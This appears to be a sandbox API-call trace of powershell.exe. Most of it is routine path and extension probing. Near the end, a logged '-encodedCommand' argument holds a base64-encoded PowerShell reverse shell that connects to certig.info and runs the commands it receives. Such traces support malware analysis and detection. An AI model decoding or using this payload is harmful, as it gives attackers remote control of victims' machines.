	[0122.938] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.938] SetErrorMode (uMode=0x1) returned 0x1
	[0122.939] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.939] SetErrorMode (uMode=0x1) returned 0x1
	[0122.939] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.939] SetErrorMode (uMode=0x1) returned 0x1
	[0122.939] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.939] SetErrorMode (uMode=0x1) returned 0x1
	[0122.940] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.940] SetErrorMode (uMode=0x1) returned 0x1
	[0122.940] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.940] SetErrorMode (uMode=0x1) returned 0x1
	[0122.940] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.940] SetErrorMode (uMode=0x1) returned 0x1
	[0122.940] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.941] SetErrorMode (uMode=0x1) returned 0x1
	[0122.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.941] SetErrorMode (uMode=0x1) returned 0x1
	[0122.941] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.941] SetErrorMode (uMode=0x1) returned 0x1
	[0122.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.942] SetErrorMode (uMode=0x1) returned 0x1
	[0122.942] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.942] SetErrorMode (uMode=0x1) returned 0x1
	[0122.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.942] SetErrorMode (uMode=0x1) returned 0x1
	[0122.942] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.942] SetErrorMode (uMode=0x1) returned 0x1
	[0122.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.943] SetErrorMode (uMode=0x1) returned 0x1
	[0122.943] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.943] SetErrorMode (uMode=0x1) returned 0x1
	[0122.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.943] SetErrorMode (uMode=0x1) returned 0x1
	[0122.943] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.944] SetErrorMode (uMode=0x1) returned 0x1
	[0122.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.944] SetErrorMode (uMode=0x1) returned 0x1
	[0122.944] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.986] SetErrorMode (uMode=0x1) returned 0x1
	[0122.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.987] SetErrorMode (uMode=0x1) returned 0x1
	[0122.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.987] SetErrorMode (uMode=0x1) returned 0x1
	[0122.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.987] SetErrorMode (uMode=0x1) returned 0x1
	[0122.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.988] SetErrorMode (uMode=0x1) returned 0x1
	[0122.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.988] SetErrorMode (uMode=0x1) returned 0x1
	[0122.988] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.988] SetErrorMode (uMode=0x1) returned 0x1
	[0122.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.988] SetErrorMode (uMode=0x1) returned 0x1
	[0122.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.989] SetErrorMode (uMode=0x1) returned 0x1
	[0122.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.989] SetErrorMode (uMode=0x1) returned 0x1
	[0122.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.989] SetErrorMode (uMode=0x1) returned 0x1
	[0122.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.990] SetErrorMode (uMode=0x1) returned 0x1
	[0122.990] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.990] SetErrorMode (uMode=0x1) returned 0x1
	[0122.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.990] SetErrorMode (uMode=0x1) returned 0x1
	[0122.990] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.990] SetErrorMode (uMode=0x1) returned 0x1
	[0122.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.991] SetErrorMode (uMode=0x1) returned 0x1
	[0122.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.991] SetErrorMode (uMode=0x1) returned 0x1
	[0122.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.991] SetErrorMode (uMode=0x1) returned 0x1
	[0122.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.992] SetErrorMode (uMode=0x1) returned 0x1
	[0122.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0122.992] SetErrorMode (uMode=0x1) returned 0x1
	[0122.992] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1cdd1020
	[0122.992] FindNextFileW (in: hFindFile=0x1cdd1020, lpFindFileData=0x1c7ed7e0 | out: lpFindFileData=0x1c7ed7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0122.993] FindClose (in: hFindFile=0x1cdd1020 | out: hFindFile=0x1cdd1020) returned 1
	[0122.993] SetErrorMode (uMode=0x1) returned 0x1
	[0122.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7ed8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0122.993] SetErrorMode (uMode=0x1) returned 0x1
	[0122.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7edb00 | out: lpFileInformation=0x1c7edb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0122.993] SetErrorMode (uMode=0x1) returned 0x1
	[0122.994] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0122.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.995] CoTaskMemFree (pv=0x1b848810) 
	[0122.995] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0122.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.996] CoTaskMemFree (pv=0x1b848810) 
	[0123.132] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0123.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.133] CoTaskMemFree (pv=0x1b848810) 
	[0123.294] CoTaskMemAlloc (cb=0x3b) returned 0x1cdf4360
	[0123.445] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7edce8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7edce8) returned 0x4550
	[0123.446] CoTaskMemFree (pv=0x1cdf4360) 
	[0123.449] GetConsoleWindow () returned 0x14017c
	[0123.616] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0123.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.616] CoTaskMemFree (pv=0x1b848810) 
	[0123.617] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0123.617] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.617] CoTaskMemFree (pv=0x1b848810) 
	[0123.624] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0123.624] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.624] CoTaskMemFree (pv=0x1b848810) 
	[0123.627] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAVwBaAHMAQwA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAE4ASQB1AEgAPQAoACQAYQBXAFoAcwBDAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABNAHkAUQBIAE8APQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABNAEYAcwBxAFYAPQAkAHAATgBJAHUASAAuAFIAZQBhAGQAKAAkAE0AeQBRAEgATwAsADAALAAkAE0AeQBRAEgATwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFoAcgBrAHkAcQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQATQB5AFEASABPACwAMAAsACQATQBGAHMAcQBWACkAOwAkAGgAaQBoAG4AVAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAWgByAGsAeQBxACAAMgA+ACYAMQApACkAOwAkAHAATgBJAHUASAAuAFcAcgBpAHQAZQAoACQAaABpAGgAbgBUACwAMAAsACQAaABpAGgAbgBUAC4ATABlAG4AZwB0AGgAKQA7ACQAcABOAEkAdQBIAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABhAFcAWgBzAEMALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQBXAFoAcwBDAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x1c7edd30 | out: pNumArgs=0x1c7edd30) returned 0x1ce09850*=""
	[0123.627] lstrlenW (lpString="-encodedCommand") returned 15
	[0123.627] CoTaskMemAlloc (cb=0x22) returned 0x1cd98f70
	[0123.627] RtlMoveMemory (in: Destination=0x1cd98f70, Source=0x1ce09872, Length=0x20 | out: Destination=0x1cd98f70) 
	[0123.627] CoTaskMemFree (pv=0x1cd98f70) 
	[0123.627] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAVwBaAHMAQwA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAE4ASQB1AEgAPQAoACQAYQBXAFoAcwBDAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABNAHkAUQBIAE8APQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABNAEYAcwBxAFYAPQAkAHAATgBJAHUASAAuAFIAZQBhAGQAKAAkAE0AeQBRAEgATwAsADAALAAkAE0AeQBRAEgATwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFoAcgBrAHkAcQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBA